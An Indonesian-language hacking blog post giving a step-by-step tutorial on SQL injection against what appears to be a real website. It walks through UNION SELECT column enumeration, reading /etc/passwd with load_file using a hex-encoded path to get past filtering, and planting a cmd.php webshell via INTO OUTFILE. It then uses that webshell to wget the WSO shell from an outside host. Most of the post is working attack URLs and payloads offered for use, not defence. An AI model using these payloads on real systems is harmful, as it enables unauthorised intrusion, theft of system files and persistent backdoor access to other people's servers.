Loading...

SQL INJECTION INTO OUT FILE (UPLOAD SHELL WITHOUT ADMIN ACCES)

SQL Injection Into Out File (Upload Shell Vulneralibity) - Halooo... apa kabar saudara saudara ku hehehehehe

Aku mau post sebuah teknik dimana baru saja aku pelajari tadi ya jadi nya begini belum ahli cuma karena keantusiasan saya mau berbagi dengan teman teman jadi saya post lah disini kita belajar bareng bareng oke Big Grin

Seperti yang kita tau bahwa untuk menanam sebuah shell biasa nya kita harus login pada sebuah web jika kita menggunakan teknik SQLi kecuali jika kita menggunakan teknik kayak XSS, LFI/RFI atau exploit uploadify kaya wp-store atau csrf dimana kita bisa mengupload shell atau backdor kita tanpa hak akses root didalam panel admin. Nah bagaimana jika sqli yg notabene kita dipaksa harus hash password dan find admin page wkwkwkwk merepotkan juga ya Big Grin

*skip skip kmon lets go to tkp :v
[!] Persiapan
1. Koneksi internet
2. Target vuln SQLi
3. kopi

-Step One

Kalau ketemu target tambahin symbol ' biar tau vuln atau kagak

Kalau vuln langsung kita injek seperti biasa

1.  Cari jumlah kolom dengan order by

2. Cari angka cantik dengn union select

Nah gambar dibawah ini kan kelihat angka cantik pada web yg aku injek

[Image: Screenshot_2014_12_22_10_41_04.jpg]



-Step Two

Kita coba lihat /etc/passwd dengan cara menambahkan

load_file(/etc/passwd) pada di angka 4

Localhost/archive.php?id=-1 union select 1,2,3,load_file(/etc/passwd),5--+

loh kok hasilnya gak keluar /etc/passwd malah error
Woles woles mari kita bypass
convert /etc/passwd ke hexadecimal
Hasilnya 2f6574632f706173737764 maka kita tambahkan 0x di depanya

0x2f6574632f706173737764

Localhost/archive.php?id=-1 union select 1,2,3,load_file(0x2f6574632f706173737764),5--+

Nanti ada gambar kayak dibawah ini


Kok cuman user root doang yang muncul..
tenang 😁 coba ctrl + u / view- source


Step 3 :
Lanjut ke tahap upload shell


pertama kita tanam cmd.php yang berfungsi untuk mengeksekusi command

Localhost/archive.php?id=-1 uniOn SelEcT 1,'',3,4 into outfile "/home/webcouncil/public_html/cmd.php"--+

into outfile "/home/webcouncil/public_html/cmd.php" : ini perintah untuk menanam script tadi dengan nama file cmd.php di direktori public_html

loh kok bisa tau kalau pathnya /home/localhost/public_html/

ingat error di web tadi?

"Warning: mysql_num_rows() expects parameter 3 to be resource, boolean given in /home/webcouncil/public_html/archive.php on line 12 "

Nah dari situ saya tau pathnya
trus load url tadi dan hasilnya malah error :

Cannot execute a blank command in /home/localhost/cmd.php on line 1

Tenang saja Smile cuma error tapi masih bisa kok
kita coba cek localhost/cmd.php
Tara ^_^ hasilnya nanti memang blank tapi bukan 404 not found lo yaa

lalu kita coba eksekusi command untuk upload shell

localhost/cmd.php?cmd=[command]

Kita pakai wget untuk upload shell.. tapi shell harus berformat txt

localhost/cmd.php?cmd=wget http://files.xakep.biz/shells/PHP/wso.txt

Dan Skarang rename wso.txt menjadi wso.php

localhost/cmd.php?cmd=mv wso.txt wso.php

Terakhir sudah ada kan shell nya?
"Kak Malaikat, Kok Aku Gak Bisa?" Aku juga gam bisa kakak Big Grin tapi aku pelajari aja terus kadang bisa kadang enggakBig Grin

Hehehehe... demikian thread dari saya, mohon maaf kalau misal repost atau gak keren
Buat yg kawan nimbrung dimari yuk kasih ilmu nya juga
Special Thanks To: X Inject, Rebels, And All Member IBT

0 Response to "SQL INJECTION INTO OUT FILE (UPLOAD SHELL WITHOUT ADMIN ACCES)"

Post a Comment

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel

Loading...